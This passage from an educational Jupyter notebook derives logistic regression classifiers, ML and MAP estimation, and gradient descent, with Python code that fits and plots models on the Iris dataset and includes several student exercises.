"### 2.2. Classifiers based on the logistic model.\n\nThe MAP classifier under a logistic model will have the form\n\n$$P_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g({\\bf w}^\\intercal{\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0} \\quad \\frac{1}{2} $$\n\nTherefore\n\n$$\n2 \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0} \\quad \n1 + \\exp(-{\\bf w}^\\intercal{\\bf x}) $$\n\nwhich is equivalent to\n\n$${\\bf w}^\\intercal{\\bf x} \n\\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad \n0 $$\n\nTherefore, the classifiers based on the logistic model are given by linear decision boundaries passing through the origin, ${\\bf x} = {\\bf 0}$. ",
"_____no_output_____"
]
],
[
[
"# Weight vector:\nw = [4, 8] # Try different weights\n\n# Create a rectangular grid.\nx_min = -1\nx_max = 1\ndx = x_max - x_min\nh = float(dx) / 200\nxgrid = np.arange(x_min, x_max, h)\nxx0, xx1 = np.meshgrid(xgrid, xgrid)\n\n# Compute the logistic map for the given weights\nZ = logistic(w[0]*xx0 + w[1]*xx1)\n\n# Plot the logistic map\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)\nax.contour(xx0, xx1, Z, levels=[0.5], colors='b', linewidths=(3,))\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\nax.set_zlabel('P(1|x,w)')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"The next code fragment represents the output of the same classifier, representing the output of the logistic function in the $x_0$-$x_1$ plane, encoding the value of the logistic function in the representation color.",
"_____no_output_____"
]
],
[
[
"CS = plt.contourf(xx0, xx1, Z)\nCS2 = plt.contour(CS, levels=[0.5],\n colors='m', linewidths=(3,))\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### 3.3. Nonlinear classifiers.\n\nThe logistic model can be extended to construct non-linear classifiers by using non-linear data transformations. A general form for a nonlinear logistic regression model is\n\n$$P_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g[{\\bf w}^\\intercal{\\bf z}({\\bf x})] $$\n\nwhere ${\\bf z}({\\bf x})$ is an arbitrary nonlinear transformation of the original variables. The boundary decision in that case is given by equation\n\n$$\n{\\bf w}^\\intercal{\\bf z} = 0\n$$",
"_____no_output_____"
],
[
"**Exercise 3**: Modify the code above to generate a 3D surface plot of the polynomial logistic regression model given by\n\n$$\nP_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g(1 + 10 x_0 + 10 x_1 - 20 x_0^2 + 5 x_0 x_1 + x_1^2) \n$$",
"_____no_output_____"
]
],
[
[
"# Weight vector:\nw = [1, 10, 10, -20, 5, 1] # Try different weights\n\n# Create a regtangular grid.\nx_min = -1\nx_max = 1\ndx = x_max - x_min\nh = float(dx) / 200\nxgrid = np.arange(x_min, x_max, h)\nxx0, xx1 = np.meshgrid(xgrid, xgrid)\n\n# Compute the logistic map for the given weights\n# Z = <FILL IN>\n\n# Plot the logistic map\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\nax.set_zlabel('P(1|x,w)')\n\nplt.show()",
"_____no_output_____"
],
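A possible way to complete the `<FILL IN>` line of Exercise 3 (again a sketch, not the official solution), evaluating the stated polynomial over the grid:

```python
Z = logistic(w[0] + w[1]*xx0 + w[2]*xx1 + w[3]*xx0**2 + w[4]*xx0*xx1 + w[5]*xx1**2)
```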
[
"CS = plt.contourf(xx0, xx1, Z)\nCS2 = plt.contour(CS, levels=[0.5],\n colors='m', linewidths=(3,))\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"## 3. Inference\n\nRemember that the idea of parametric classification is to use the training data set $\\mathcal D = \\{({\\bf x}^{(k)}, y^{(k)}) \\in {\\mathbb{R}}^N \\times \\{0,1\\}, k=0,\\ldots,{K-1}\\}$ to set the parameter vector ${\\bf w}$ according to certain criterion. Then, the estimate $\\hat{\\bf w}$ can be used to compute the label prediction for any new observation as \n\n$$\\hat{y} = \\arg\\max_y P_{Y|{\\bf X}}(y|{\\bf x},\\hat{\\bf w}).$$\n\n<img src=\"figs/parametric_decision.png\" width=400>\n\n",
"_____no_output_____"
],
[
"We need still to choose a criterion to optimize with the selection of the parameter vector. In the notebook, we will discuss two different approaches to the estimation of ${\\bf w}$:\n\n * Maximum Likelihood (ML): $\\hat{\\bf w}_{\\text{ML}} = \\arg\\max_{\\bf w} P_{{\\mathcal D}|{\\bf W}}({\\mathcal D}|{\\bf w})$\n * Maximum *A Posteriori* (MAP): $\\hat{\\bf w}_{\\text{MAP}} = \\arg\\max_{\\bf w} p_{{\\bf W}|{\\mathcal D}}({\\bf w}|{\\mathcal D})$\n",
"_____no_output_____"
],
[
"\nFor the mathematical derivation of the logistic regression algorithm, the following representation of the logistic model will be useful: noting that\n\n$$P_{Y|{\\bf X}}(0|{\\bf x}, {\\bf w}) = 1-g[{\\bf w}^\\intercal{\\bf z}({\\bf x})]\n= g[-{\\bf w}^\\intercal{\\bf z}({\\bf x})]$$\n\nwe can write\n\n$$P_{Y|{\\bf X}}(y|{\\bf x}, {\\bf w}) = g[\\overline{y}{\\bf w}^\\intercal{\\bf z}({\\bf x})]$$\n\nwhere $\\overline{y} = 2y-1$ is a *symmetrized label* ($\\overline{y}\\in\\{-1, 1\\}$). ",
"_____no_output_____"
],
[
"### 3.1. Model assumptions\n\nIn the following, we will make the following assumptions:\n\n- **A1**. (Logistic Regression): We assume a logistic model for the *a posteriori* probability of ${Y}$ given ${\\bf X}$, i.e.,\n\n$$P_{Y|{\\bf X}}(y|{\\bf x}, {\\bf w}) = g[{\\bar y}{\\bf w}^\\intercal{\\bf z}({\\bf x})].$$\n\n- **A2**. All samples in ${\\mathcal D}$ have been generated from the same distribution, $p_{{\\bf X}, Y}({\\bf x}, y)$.\n\n- **A3**. Input variables $\\bf x$ do not depend on $\\bf w$. This implies that \n\n$$p({\\bf x}|{\\bf w}) = p({\\bf x})$$\n\n- **A4**. Targets $y^{(0)}, \\cdots, y^{(K-1)}$ are statistically independent given $\\bf w$ and the inputs ${\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}$, that is:\n\n$$P(y^{(0)}, \\cdots, y^{(K-1)} | {\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) = \\prod_{k=0}^{K-1} P(y^{(k)} | {\\bf x}^{(k)}, {\\bf w})$$\n",
"_____no_output_____"
],
[
"### 3.2. ML estimation.\n\nThe ML estimate is defined as\n\n$$\\hat{\\bf w}_{\\text{ML}} = \\arg\\max_{\\bf w} P_{{\\mathcal D}|{\\bf W}}({\\mathcal D}|{\\bf w})$$\n\nUssing assumptions A2 and A3 above, we have that\n\n\\begin{align}\nP_{{\\mathcal D}|{\\bf W}}({\\mathcal D}|{\\bf w}) & = p(y^{(0)}, \\cdots, y^{(K-1)},{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}| {\\bf w}) \\\\\n& = P(y^{(0)}, \\cdots, y^{(K-1)}|{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) \\; p({\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}| {\\bf w}) \\\\\n& = P(y^{(0)}, \\cdots, y^{(K-1)}|{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) \\; p({\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)})\\end{align}\n\nFinally, using assumption A4, we can formulate the ML estimation of $\\bf w$ as the resolution of the following optimization problem\n\n\\begin{align}\n\\hat {\\bf w}_\\text{ML} & = \\arg \\max_{\\bf w} P(y^{(0)}, \\cdots, y^{(K-1)}|{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) \\\\\n& = \\arg \\max_{\\bf w} \\prod_{k=0}^{K-1} P(y^{(k)}|{\\bf x}^{(k)}, {\\bf w}) \\\\\n& = \\arg \\max_{\\bf w} \\sum_{k=0}^{K-1} \\log P(y^{(k)}|{\\bf x}^{(k)}, {\\bf w}) \\\\\n& = \\arg \\min_{\\bf w} \\sum_{k=0}^{K-1} - \\log P(y^{(k)}|{\\bf x}^{(k)}, {\\bf w})\n\\end{align}\n\nwhere the arguments of the maximization or minimization problems of the last three lines are usually referred to as the **likelihood**, **log-likelihood** $\\left[L(\\bf w)\\right]$, and **negative log-likelihood** $\\left[\\text{NLL}(\\bf w)\\right]$, respectively.",
"_____no_output_____"
],
[
"\nNow, using A1 (the logistic model)\n\n\\begin{align}\n\\text{NLL}({\\bf w}) \n &= - \\sum_{k=0}^{K-1}\\log\\left[g\\left(\\overline{y}^{(k)}{\\bf w}^\\intercal {\\bf z}^{(k)}\\right)\\right] \\\\\n &= \\sum_{k=0}^{K-1}\\log\\left[1+\\exp\\left(-\\overline{y}^{(k)}{\\bf w}^\\intercal {\\bf z}^{(k)}\\right)\\right]\n\\end{align}\n\nwhere ${\\bf z}^{(k)}={\\bf z}({\\bf x}^{(k)})$.\n",
"_____no_output_____"
],
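A small sketch of how the negative log-likelihood above could be evaluated with NumPy (an editorial addition; `Z` is assumed to be the K-row matrix of transformed inputs and `y` the vector of 0/1 labels):

```python
def nll(w, Z, y):
    y_bar = 2*y - 1                                  # symmetrized labels in {-1, +1}
    # log(1 + exp(-y_bar * w'z)) summed over the training set;
    # np.logaddexp(0, x) computes log(1 + exp(x)) in a numerically stable way
    return np.sum(np.logaddexp(0, -y_bar * (Z @ w)))
```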
[
"\nIt can be shown that $\\text{NLL}({\\bf w})$ is a convex and differentiable function of ${\\bf w}$. Therefore, its minimum is a point with zero gradient.\n\n\\begin{align}\n\\nabla_{\\bf w} \\text{NLL}(\\hat{\\bf w}_{\\text{ML}}) \n &= - \\sum_{k=0}^{K-1} \n \\frac{\\exp\\left(-\\overline{y}^{(k)}\\hat{\\bf w}_{\\text{ML}}^\\intercal {\\bf z}^{(k)}\\right) \\overline{y}^{(k)} {\\bf z}^{(k)}}\n {1+\\exp\\left(-\\overline{y}^{(k)}\\hat{\\bf w}_{\\text{ML}}^\\intercal {\\bf z}^{(k)}\n \\right)} = \\\\\n &= - \\sum_{k=0}^{K-1} \\left[y^{(k)}-g(\\hat{\\bf w}_{\\text{ML}}^T {\\bf z}^{(k)})\\right] {\\bf z}^{(k)} = 0\n\\end{align}\n\nUnfortunately, $\\hat{\\bf w}_{\\text{ML}}$ cannot be taken out from the above equation, and some iterative optimization algorithm must be used to search for the minimum.",
"_____no_output_____"
],
[
"### 3.2. Gradient descent.\n\nA simple iterative optimization algorithm is <a href = https://en.wikipedia.org/wiki/Gradient_descent> gradient descent</a>. \n\n\\begin{align}\n{\\bf w}_{n+1} = {\\bf w}_n - \\rho_n \\nabla_{\\bf w} \\text{NLL}({\\bf w}_n)\n\\end{align}\n\nwhere $\\rho_n >0$ is the *learning step*.\n\nApplying the gradient descent rule to logistic regression, we get the following algorithm:\n\n\\begin{align}\n{\\bf w}_{n+1} &= {\\bf w}_n \n + \\rho_n \\sum_{k=0}^{K-1} \\left[y^{(k)}-g({\\bf w}_n^\\intercal {\\bf z}^{(k)})\\right] {\\bf z}^{(k)}\n\\end{align}\n",
"_____no_output_____"
],
[
"\nDefining vectors\n\n\\begin{align}\n{\\bf y} &= [y^{(0)},\\ldots,y^{(K-1)}]^\\top \\\\\n\\hat{\\bf p}_n &= [g({\\bf w}_n^\\top {\\bf z}^{(0)}), \\ldots, g({\\bf w}_n^\\top {\\bf z}^{(K-1)})]^\\top\n\\end{align}\nand matrix\n\\begin{align}\n{\\bf Z} = \\left[{\\bf z}^{(0)},\\ldots,{\\bf z}^{(K-1)}\\right]^\\top\n\\end{align}\n\nwe can write\n\n\\begin{align}\n{\\bf w}_{n+1} &= {\\bf w}_n \n + \\rho_n {\\bf Z}^\\top \\left({\\bf y}-\\hat{\\bf p}_n\\right)\n\\end{align}\n\nIn the following, we will explore the behavior of the gradient descend method using the Iris Dataset.",
"_____no_output_____"
],
[
"#### 3.2.1 Example: Iris Dataset.\n\nAs an illustration, consider the <a href = http://archive.ics.uci.edu/ml/datasets/Iris> Iris dataset </a>, taken from the <a href=http://archive.ics.uci.edu/ml/> UCI Machine Learning repository</a>. This data set contains 3 classes of 50 instances each, where each class refers to a type of iris plant (*setosa*, *versicolor* or *virginica*). Each instance contains 4 measurements of given flowers: sepal length, sepal width, petal length and petal width, all in centimeters. \n\nWe will try to fit the logistic regression model to discriminate between two classes using only two attributes.\n\nFirst, we load the dataset and split them in training and test subsets.",
"_____no_output_____"
]
],
[
[
"# Adapted from a notebook by Jason Brownlee\ndef loadDataset(filename, split):\n xTrain = []\n cTrain = []\n xTest = []\n cTest = []\n\n with open(filename, 'r') as csvfile:\n lines = csv.reader(csvfile)\n dataset = list(lines)\n for i in range(len(dataset)-1):\n for y in range(4):\n dataset[i][y] = float(dataset[i][y])\n item = dataset[i]\n if random.random() < split:\n xTrain.append(item[0:4])\n cTrain.append(item[4])\n else:\n xTest.append(item[0:4])\n cTest.append(item[4])\n return xTrain, cTrain, xTest, cTest\n\nxTrain_all, cTrain_all, xTest_all, cTest_all = loadDataset('iris.data', 0.66)\nnTrain_all = len(xTrain_all)\nnTest_all = len(xTest_all)\nprint('Train:', nTrain_all)\nprint('Test:', nTest_all)",
"_____no_output_____"
]
],
[
[
"Now, we select two classes and two attributes.",
"_____no_output_____"
]
],
[
[
"# Select attributes\ni = 0 # Try 0,1,2,3\nj = 1 # Try 0,1,2,3 with j!=i\n\n# Select two classes\nc0 = 'Iris-versicolor' \nc1 = 'Iris-virginica'\n\n# Select two coordinates\nind = [i, j]\n\n# Take training test\nX_tr = np.array([[xTrain_all[n][i] for i in ind] for n in range(nTrain_all) \n if cTrain_all[n]==c0 or cTrain_all[n]==c1])\nC_tr = [cTrain_all[n] for n in range(nTrain_all) \n if cTrain_all[n]==c0 or cTrain_all[n]==c1]\nY_tr = np.array([int(c==c1) for c in C_tr])\nn_tr = len(X_tr)\n\n# Take test set\nX_tst = np.array([[xTest_all[n][i] for i in ind] for n in range(nTest_all) \n if cTest_all[n]==c0 or cTest_all[n]==c1])\nC_tst = [cTest_all[n] for n in range(nTest_all) \n if cTest_all[n]==c0 or cTest_all[n]==c1]\nY_tst = np.array([int(c==c1) for c in C_tst])\nn_tst = len(X_tst)",
"_____no_output_____"
]
],
[
[
"#### 3.2.2. Data normalization\n\nNormalization of data is a common pre-processing step in many machine learning algorithms. Its goal is to get a dataset where all input coordinates have a similar scale. Learning algorithms usually show less instabilities and convergence problems when data are normalized.\n\nWe will define a normalization function that returns a training data matrix with zero sample mean and unit sample variance.",
"_____no_output_____"
]
],
[
[
"def normalize(X, mx=None, sx=None):\n \n # Compute means and standard deviations\n if mx is None:\n mx = np.mean(X, axis=0)\n if sx is None:\n sx = np.std(X, axis=0)\n\n # Normalize\n X0 = (X-mx)/sx\n\n return X0, mx, sx",
"_____no_output_____"
]
],
[
[
"Now, we can normalize training and test data. Observe in the code that the same transformation should be applied to training and test data. This is the reason why normalization with the test data is done using the means and the variances computed with the training set.",
"_____no_output_____"
]
],
[
[
"# Normalize data\nXn_tr, mx, sx = normalize(X_tr)\nXn_tst, mx, sx = normalize(X_tst, mx, sx)",
"_____no_output_____"
]
],
[
[
"The following figure generates a plot of the normalized training data.",
"_____no_output_____"
]
],
[
[
"# Separate components of x into different arrays (just for the plots)\nx0c0 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==0]\nx1c0 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==0]\nx0c1 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==1]\nx1c1 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==1]\n\n# Scatterplot.\nlabels = {'Iris-setosa': 'Setosa', \n 'Iris-versicolor': 'Versicolor',\n 'Iris-virginica': 'Virginica'}\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.legend(loc='best')\nplt.axis('equal')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"In order to apply the gradient descent rule, we need to define two methods: \n - A `fit` method, that receives the training data and returns the model weights and the value of the negative log-likelihood during all iterations.\n - A `predict` method, that receives the model weight and a set of inputs, and returns the posterior class probabilities for that input, as well as their corresponding class predictions.",
"_____no_output_____"
]
],
[
[
"def logregFit(Z_tr, Y_tr, rho, n_it):\n\n # Data dimension\n n_dim = Z_tr.shape[1]\n\n # Initialize variables\n nll_tr = np.zeros(n_it)\n pe_tr = np.zeros(n_it)\n Y_tr2 = 2*Y_tr - 1 # Transform labels into binary symmetric.\n w = np.random.randn(n_dim,1)\n\n # Running the gradient descent algorithm\n for n in range(n_it):\n \n # Compute posterior probabilities for weight w\n p1_tr = logistic(np.dot(Z_tr, w))\n\n # Compute negative log-likelihood\n # (note that this is not required for the weight update, only for nll tracking)\n nll_tr[n] = np.sum(np.log(1 + np.exp(-np.dot(Y_tr2*Z_tr, w)))) \n\n # Update weights\n w += rho*np.dot(Z_tr.T, Y_tr - p1_tr)\n \n return w, nll_tr\n\ndef logregPredict(Z, w):\n\n # Compute posterior probability of class 1 for weights w.\n p = logistic(np.dot(Z, w)).flatten()\n \n # Class\n D = [int(round(pn)) for pn in p]\n \n return p, D",
"_____no_output_____"
]
],
[
[
"We can test the behavior of the gradient descent method by fitting a logistic regression model with ${\\bf z}({\\bf x}) = (1, {\\bf x}^\\top)^\\top$.",
"_____no_output_____"
]
],
[
[
"# Parameters of the algorithms\nrho = float(1)/50 # Learning step\nn_it = 200 # Number of iterations\n\n# Compute Z's\nZ_tr = np.c_[np.ones(n_tr), Xn_tr] \nZ_tst = np.c_[np.ones(n_tst), Xn_tst]\nn_dim = Z_tr.shape[1]\n\n# Convert target arrays to column vectors\nY_tr2 = Y_tr[np.newaxis].T\nY_tst2 = Y_tst[np.newaxis].T\n\n# Running the gradient descent algorithm\nw, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)\n\n# Classify training and test data\np_tr, D_tr = logregPredict(Z_tr, w)\np_tst, D_tst = logregPredict(Z_tst, w)\n\n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\n# NLL plot.\nplt.plot(range(n_it), nll_tr,'b.:', label='Train')\nplt.xlabel('Iteration')\nplt.ylabel('Negative Log-Likelihood')\nplt.legend()\n\nprint('The optimal weights are:')\nprint(w)\nprint('The final error rates are:')\nprint('- Training:', pe_tr)\nprint('- Test:', pe_tst)\nprint('The NLL after training is', nll_tr[len(nll_tr)-1])",
"_____no_output_____"
]
],
[
[
"#### 3.2.3. Free parameters\n\nUnder certain conditions, the gradient descent method can be shown to converge asymptotically (i.e. as the number of iterations goes to infinity) to the ML estimate of the logistic model. However, in practice, the final estimate of the weights ${\\bf w}$ depend on several factors:\n\n- Number of iterations\n- Initialization\n- Learning step",
"_____no_output_____"
],
[
"**Exercise 4**: Visualize the variability of gradient descent caused by initializations. To do so, fix the number of iterations to 200 and the learning step, and execute the gradient descent 100 times, storing the training error rate of each execution. Plot the histogram of the error rate values.\n\nNote that you can do this exercise with a loop over the 100 executions, including the code in the previous code slide inside the loop, with some proper modifications. To plot a histogram of the values in array `p` with `n`bins, you can use `plt.hist(p, n)`",
"_____no_output_____"
],
[
"##### 3.2.3.1. Learning step\n\nThe learning step, $\\rho$, is a free parameter of the algorithm. Its choice is critical for the convergence of the algorithm. Too large values of $\\rho$ make the algorithm diverge. For too small values, the convergence gets very slow and more iterations are required for a good convergence.\n",
"_____no_output_____"
],
[
"**Exercise 5**: Observe the evolution of the negative log-likelihood with the number of iterations for different values of $\\rho$. It is easy to check that, for large enough $\\rho$, the gradient descent method does not converge. Can you estimate (through manual observation) an approximate value of $\\rho$ stating a boundary between convergence and divergence?",
"_____no_output_____"
],
[
"**Exercise 6**: In this exercise we explore the influence of the learning step more sistematically. Use the code in the previouse exercises to compute, for every value of $\\rho$, the average error rate over 100 executions. Plot the average error rate vs. $\\rho$. \n\nNote that you should explore the values of $\\rho$ in a logarithmic scale. For instance, you can take $\\rho = 1, \\frac{1}{10}, \\frac{1}{100}, \\frac{1}{1000}, \\ldots$",
"_____no_output_____"
],
[
"In practice, the selection of $\\rho$ may be a matter of trial an error. Also there is some theoretical evidence that the learning step should decrease along time up to cero, and the sequence $\\rho_n$ should satisfy two conditions:\n- C1: $\\sum_{n=0}^{\\infty} \\rho_n^2 < \\infty$ (decrease slowly)\n- C2: $\\sum_{n=0}^{\\infty} \\rho_n = \\infty$ (but not too slowly)\n\nFor instance, we can take $\\rho_n= \\frac{1}{n}$. Another common choice is $\\rho_n = \\frac{\\alpha}{1+\\beta n}$ where $\\alpha$ and $\\beta$ are also free parameters that can be selected by trial and error with some heuristic method.",
"_____no_output_____"
],
[
"#### 3.2.4. Visualizing the posterior map.\n\nWe can also visualize the posterior probability map estimated by the logistic regression model for the estimated weights.",
"_____no_output_____"
]
],
[
[
"# Create a regtangular grid.\nx_min, x_max = Xn_tr[:, 0].min(), Xn_tr[:, 0].max() \ny_min, y_max = Xn_tr[:, 1].min(), Xn_tr[:, 1].max()\ndx = x_max - x_min\ndy = y_max - y_min\nh = dy /400\nxx, yy = np.meshgrid(np.arange(x_min - 0.1 * dx, x_max + 0.1 * dx, h),\n np.arange(y_min - 0.1 * dx, y_max + 0.1 * dy, h))\nX_grid = np.array([xx.ravel(), yy.ravel()]).T\n\n# Compute Z's\nZ_grid = np.c_[np.ones(X_grid.shape[0]), X_grid] \n\n# Compute the classifier output for all samples in the grid.\npp, dd = logregPredict(Z_grid, w)\n\n# Paint output maps\npylab.rcParams['figure.figsize'] = 6, 6 # Set figure size\n\n# Put the result into a color plot\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.legend(loc='best')\nplt.axis('equal')\npp = pp.reshape(xx.shape)\nCS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)\nplt.contour(xx, yy, pp, levels=[0.5],\n colors='b', linewidths=(3,))\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\n\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"#### 3.2.5. Polynomial Logistic Regression\n\nThe error rates of the logistic regression model can be potentially reduced by using polynomial transformations.\n\nTo compute the polynomial transformation up to a given degree, we can use the `PolynomialFeatures` method in `sklearn.preprocessing`.",
"_____no_output_____"
]
],
[
[
"# Parameters of the algorithms\nrho = float(1)/50 # Learning step\nn_it = 500 # Number of iterations\ng = 5 # Degree of polynomial\n\n# Compute Z_tr\npoly = PolynomialFeatures(degree=g)\nZ_tr = poly.fit_transform(Xn_tr)\n# Normalize columns (this is useful to make algorithms more stable).)\nZn, mz, sz = normalize(Z_tr[:,1:])\nZ_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)\n\n# Compute Z_tst\nZ_tst = poly.fit_transform(Xn_tst)\nZn, mz, sz = normalize(Z_tst[:,1:], mz, sz)\nZ_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)\n\n# Convert target arrays to column vectors\nY_tr2 = Y_tr[np.newaxis].T\nY_tst2 = Y_tst[np.newaxis].T\n\n# Running the gradient descent algorithm\nw, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)\n\n# Classify training and test data\np_tr, D_tr = logregPredict(Z_tr, w)\np_tst, D_tst = logregPredict(Z_tst, w)\n \n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\n# NLL plot.\nplt.plot(range(n_it), nll_tr,'b.:', label='Train')\nplt.xlabel('Iteration')\nplt.ylabel('Negative Log-Likelihood')\nplt.legend()\n\nprint('The optimal weights are:')\nprint(w)\nprint('The final error rates are:')\nprint('- Training:', pe_tr)\nprint('- Test:', pe_tst)\nprint('The NLL after training is', nll_tr[len(nll_tr)-1])",
"_____no_output_____"
]
],
[
[
"Visualizing the posterior map we can se that the polynomial transformation produces nonlinear decision boundaries.",
"_____no_output_____"
]
],
[
[
"# Compute Z_grid\nZ_grid = poly.fit_transform(X_grid)\nn_grid = Z_grid.shape[0]\nZn, mz, sz = normalize(Z_grid[:,1:], mz, sz)\nZ_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)\n\n# Compute the classifier output for all samples in the grid.\npp, dd = logregPredict(Z_grid, w)\npp = pp.reshape(xx.shape)\n\n# Paint output maps\npylab.rcParams['figure.figsize'] = 6, 6 # Set figure size\n\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.axis('equal')\nplt.legend(loc='best')\nCS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)\nplt.contour(xx, yy, pp, levels=[0.5],\n colors='b', linewidths=(3,))\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"## 4. Regularization and MAP estimation.\n\nAn alternative to the ML estimation of the weights in logistic regression is Maximum A Posteriori estimation. Modelling the logistic regression weights as a random variable with prior distribution $p_{\\bf W}({\\bf w})$, the MAP estimate is defined as\n\n$$\n\\hat{\\bf w}_{\\text{MAP}} = \\arg\\max_{\\bf w} p({\\bf w}|{\\mathcal D})\n$$\n\nThe posterior density $p({\\bf w}|{\\mathcal D})$ is related to the likelihood function and the prior density of the weights, $p_{\\bf W}({\\bf w})$ through the Bayes rule\n\n$$\np({\\bf w}|{\\mathcal D}) = \n \\frac{P\\left({\\mathcal D}|{\\bf w}\\right) \\; p_{\\bf W}({\\bf w})}\n {p\\left({\\mathcal D}\\right)}\n$$\n\nIn general, the denominator in this expression cannot be computed analytically. However, it is not required for MAP estimation because it does not depend on ${\\bf w}$. Therefore, the MAP solution is given by\n\n\\begin{align}\n\\hat{\\bf w}_{\\text{MAP}} & = \\arg\\max_{\\bf w} \\left\\{ P\\left({\\mathcal D}|{\\bf w}\\right) \\; p_{\\bf W}({\\bf w}) \\right\\}\\\\\n& = \\arg\\max_{\\bf w} \\left\\{ L({\\mathbf w}) + \\log p_{\\bf W}({\\bf w})\\right\\} \\\\\n& = \\arg\\min_{\\bf w} \\left\\{ \\text{NLL}({\\mathbf w}) - \\log p_{\\bf W}({\\bf w})\\right\\}\n\\end{align}",
"_____no_output_____"
],
[
"\nIn the light of this expression, we can conclude that the MAP solution is affected by two terms:\n\n - The likelihood, which takes large values for parameter vectors $\\bf w$ that fit well the training data (smaller $\\text{NLL}$ values)\n - The prior distribution of weights $p_{\\bf W}({\\bf w})$, which expresses our *a priori* preference for some solutions. **Usually, we recur to prior distributions that take large values when $\\|{\\bf w}\\|$ is small (associated to smooth classification borders).**\n",
"_____no_output_____"
],
[
"We can check that the MAP criterion adds a penalty term to the ML objective, that penalizes parameter vectors for which the prior distribution of weights takes small values.\n\n### 4.1 MAP estimation with Gaussian prior\n\nIf we assume that ${\\bf W}$ follows a zero-mean Gaussian random variable with variance matrix $v{\\bf I}$, \n\n$$\np_{\\bf W}({\\bf w}) = \\frac{1}{(2\\pi v)^{N/2}} \\exp\\left(-\\frac{1}{2v}\\|{\\bf w}\\|^2\\right)\n$$\n\nthe MAP estimate becomes\n\n\\begin{align}\n\\hat{\\bf w}_{\\text{MAP}} \n &= \\arg\\min_{\\bf w} \\left\\{\\text{NLL}({\\bf w}) + \\frac{1}{C}\\|{\\bf w}\\|^2\n \\right\\}\n\\end{align}\n\nwhere $C = 2v$. Noting that\n\n$$\\nabla_{\\bf w}\\left\\{\\text{NLL}({\\bf w}) + \\frac{1}{C}\\|{\\bf w}\\|^2\\right\\} \n= - {\\bf Z} \\left({\\bf y}-\\hat{\\bf p}_n\\right) + \\frac{2}{C}{\\bf w},\n$$\n\nwe obtain the following gradient descent rule for MAP estimation\n\n\\begin{align}\n{\\bf w}_{n+1} &= \\left(1-\\frac{2\\rho_n}{C}\\right){\\bf w}_n \n + \\rho_n {\\bf Z} \\left({\\bf y}-\\hat{\\bf p}_n\\right)\n\\end{align}\n",
"_____no_output_____"
],
[
